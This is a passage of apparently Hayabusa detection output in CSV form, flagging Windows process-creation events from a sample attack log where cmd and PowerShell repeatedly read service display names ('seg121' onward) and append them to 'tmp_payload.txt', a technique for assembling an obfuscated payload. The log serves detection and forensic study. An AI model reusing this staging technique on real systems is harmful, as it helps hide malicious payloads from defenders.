Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:23.168 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:23.168 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:24.599 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:24.615 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:24.615 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:26.056 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:26.072 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:26.072 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:27.510 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:27.525 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:27.525 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:28.961 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:28.961 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:28.961 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:30.412 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:30.412 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:30.412 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:31.851 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg127"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:31.867 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg127"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:31.867 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:33.302 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:33.318 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:33.318 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:34.772 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:34.772 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:34.772 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:36.225 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:36.225 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:36.225 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:37.694 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:37.694 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfdc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:37.694 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:39.178 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:39.178 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:39.178 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:40.633 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x950 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:40.633 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:40.633 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:42.102 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:42.102 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7ec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:42.102 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:43.595 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:43.610 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:43.610 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:45.043 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x81c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:45.043 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:45.043 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:46.509 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:46.509 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:46.509 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:48.025 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:48.025 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:48.025 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:49.478 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 